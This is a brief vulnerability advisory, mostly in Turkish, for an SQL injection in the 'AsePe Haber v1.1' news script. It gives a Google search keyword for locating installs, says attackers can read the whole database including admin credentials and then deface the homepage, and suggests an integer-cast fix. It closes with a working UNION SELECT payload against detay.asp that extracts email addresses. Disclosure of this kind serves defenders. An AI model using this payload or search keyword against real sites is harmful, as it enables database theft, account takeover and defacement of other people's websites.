< ------------------- header data start ------------------- >

################################################## ###########

# Application Name : AsePe Haber v1.1

# Vulnerable Type : SQL Injection

# Google Keyword : AsePe Haber v1.1

# Infection : Y&ouml;netici bilgileride dahil olmak üzere veritabanındaki tüm verilere erişim sağlanabilir. Elde edilen Y&ouml;netici şifresi ile sisteme giriş yapılarak haber vb. içerik eklemek suretiyle ilgili site ana sayfası y&ouml;nlendirilerek hack edilebilir.

# Bug Fix Advice : id değişkeni sadece Integer değer alacak şekilde düzenlenmelidir.
İlgili Güvenlik açığının kapatılması için &Ouml;rnek Kod: id = Cint(Request.QueryString(id))

# author : Bug Researchers

################################################## ###########

< ------------------- header data end of ------------------- >



< -- bug code start -- >

 target]  /detay.asp?id=-1+union+select+0,email,2,3,4,5,6,7,8,9,10+from+hab er

< -- bug code end of -- >